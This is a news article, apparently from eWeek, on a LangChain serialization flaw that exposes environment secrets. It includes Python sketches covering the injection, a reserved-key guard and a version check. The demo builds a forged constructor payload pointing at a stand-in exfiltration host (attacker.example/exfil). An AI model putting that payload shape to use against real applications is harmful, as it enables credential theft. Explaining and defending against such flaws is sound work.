LangChain AI Vulnerability Exposes Millions of Apps
Monday, December 29, 2025, 16:11, by eWeek
Millions of AI apps trust LangChain to handle sensitive data. That trust just took a serious hit. A critical security flaw has struck LangChain, one of the most widely used AI frameworks in the world, exposing millions of applications to potential secret theft and malicious code injection. Security researchers say the vulnerability lets attackers abuse LangChain's core serialization logic to extract environment variables and execute unauthorized actions, putting API keys, credentials, and sensitive data at risk across the AI ecosystem.

How attackers are exploiting this 'Christmas gift' vulnerability

The attack vector centers on LangChain serialization functions that failed to properly handle user-controlled data. Industry analysis published today reveals that the dumps() and dumpd() functions do not escape dictionaries containing 'lc' keys, the internal markers LangChain uses to identify its own serialized objects. When malicious actors inject data with these special keys, the system treats it as legitimate LangChain content during deserialization rather than as untrusted user input. A Cyata security expert discovered the flaw during AI trust boundary audits, spotting the missing escape mechanism in the serialization code.

The vulnerability enables multiple devastating attack paths:

- secret extraction from environment variables when deserialization runs with 'secrets_from_env=True'
- instantiation of classes within trusted namespaces such as langchain_core and langchain_community
- potential arbitrary code execution through Jinja2 templates

Think API keys, database passwords, authentication tokens: everything attackers need to break into corporate systems. Threat actors can craft prompts that instantiate allowlisted classes, triggering SSRF attacks with environment variables embedded in request headers for data exfiltration. Since the flaw affects common flows such as event streaming, logging, and caching, virtually any LangChain application processing untrusted data could be compromised.

The race against time: patches and protection strategies

LangChain responded swiftly to the disclosure, releasing patches that fundamentally change how the framework handles serialization security. The fixes published today add allowlist parameters to the load() and loads() functions to specify which classes may be serialized and deserialized. Jinja2 templates are now blocked by default, and the dangerous 'secrets_from_env' option now defaults to 'False' to prevent automatic secret loading from environment variables. Vulnerable releases of langchain-core include versions from 1.0.0 up to (but not including) 1.2.5, as well as versions below 0.3.81; fixes ship in 1.2.5 and 0.3.81 respectively. The issue was originally reported via Huntr on Dec. 4; LangChain acknowledged it the next day and published the advisory on Dec. 24. Adding to the chaos, a parallel vulnerability hit LangChainJS, tracked as CVE-2025-68665, demonstrating that this serialization injection problem affects the entire LangChain ecosystem.

What this means for your AI applications right now

Cybersecurity experts are issuing urgent warnings: upgrade langchain-core immediately and verify that dependencies such as langchain-community are also updated. Organizations must treat LLM outputs as untrusted data, audit deserialization in streaming and logging systems, and disable secret resolution unless inputs are thoroughly verified. The timing amplifies the urgency: amid booming LLM application adoption, organizations must inventory their agent deployments for swift triage.
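To make the trust-boundary confusion concrete, here is a minimal, self-contained Python sketch. It deliberately does not import LangChain; it only mimics the marker format described above (an 'lc' version key, a 'type', a dotted class path, and constructor kwargs), and every name in it is illustrative rather than part of the real API. The point is that a serializer that writes user-controlled dictionaries verbatim, without escaping the reserved key, lets attacker data masquerade as one of the framework's own serialized constructors on the way back in.

```python
import json

def serialize(obj: dict) -> str:
    # A naive serializer: user-controlled dicts are written out verbatim,
    # with no escaping of the reserved "lc" key.
    return json.dumps(obj)

def deserialize(raw: str) -> object:
    data = json.loads(raw)
    if isinstance(data, dict) and "lc" in data and data.get("type") == "constructor":
        # Anything shaped like the framework's own output is trusted here;
        # a real deserializer would instantiate the named class with
        # attacker-chosen kwargs at this point.
        return f"would instantiate {'.'.join(data['id'])} with {data['kwargs']}"
    return data

# Attacker-controlled content (for example an LLM output or user message)
# that happens to carry the reserved keys.
malicious_user_data = {
    "lc": 1,
    "type": "constructor",
    "id": ["some_trusted_namespace", "SomeAllowlistedClass"],
    "kwargs": {"url": "http://attacker.example/exfil"},
}

# Round-tripping through logging, caching, or event streaming turns
# untrusted input into a "trusted" constructor record.
print(deserialize(serialize(malicious_user_data)))
```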
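On the mitigation side, and only as a stopgap for code that cannot take the patched releases yet, the advice to treat LLM output as untrusted before it reaches logging, caching, or event-streaming paths could be approximated with a small input guard like the sketch below. The function name and the recursive reserved-key check are assumptions made for illustration; they are not part of LangChain and are no substitute for upgrading to langchain-core 1.2.5 or 0.3.81.

```python
from typing import Any

RESERVED_KEY = "lc"  # marker LangChain uses for its own serialized objects, per the advisory

def reject_reserved_keys(data: Any) -> Any:
    """Raise if untrusted data carries the framework's serialization marker.

    Call this on LLM outputs or user-supplied structures before they are
    logged, cached, streamed, or otherwise fed back through serialization.
    """
    if isinstance(data, dict):
        if RESERVED_KEY in data:
            raise ValueError("untrusted payload carries the reserved 'lc' marker")
        for value in data.values():
            reject_reserved_keys(value)
    elif isinstance(data, (list, tuple)):
        for item in data:
            reject_reserved_keys(item)
    return data
```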
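For teams inventorying deployments, a small triage helper, again sketched purely for illustration, can flag whether an installed langchain-core falls inside the vulnerable ranges described above (1.0.0 up to 1.2.5, or anything below 0.3.81). The version parsing here is deliberately simple and handles numeric dotted releases only; real deployments may prefer the packaging library.

```python
from importlib.metadata import PackageNotFoundError, version

def parse(v: str) -> tuple:
    # Keep only the first three numeric components (e.g. "1.2.5" -> (1, 2, 5)).
    return tuple(int(part) for part in v.split(".")[:3])

def is_vulnerable(v: str) -> bool:
    release = parse(v)
    if release >= (1, 0, 0):
        return release < (1, 2, 5)   # 1.x line fixed in 1.2.5
    return release < (0, 3, 81)      # 0.x line fixed in 0.3.81

try:
    installed = version("langchain-core")
    status = "VULNERABLE - upgrade now" if is_vulnerable(installed) else "patched"
    print(f"langchain-core {installed}: {status}")
except PackageNotFoundError:
    print("langchain-core is not installed in this environment")
```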
This vulnerability underscores the critical need to treat AI model outputs with the same security scrutiny as any external data source, fundamentally changing how developers must approach AI application security. Given LangChain's massive footprint across the AI ecosystem, industry insiders are calling this more than just another security patch: it's a wake-up call for the entire industry to rethink trust boundaries in AI applications before attackers turn the holiday season into a data theft bonanza. Related: OpenAI is also tightening its defenses. Here's how the company is using its new Atlas system to detect and disrupt ChatGPT abuse at scale.
https://www.eweek.com/news/langchain-ai-vulnerability-exposes-apps-to-hack/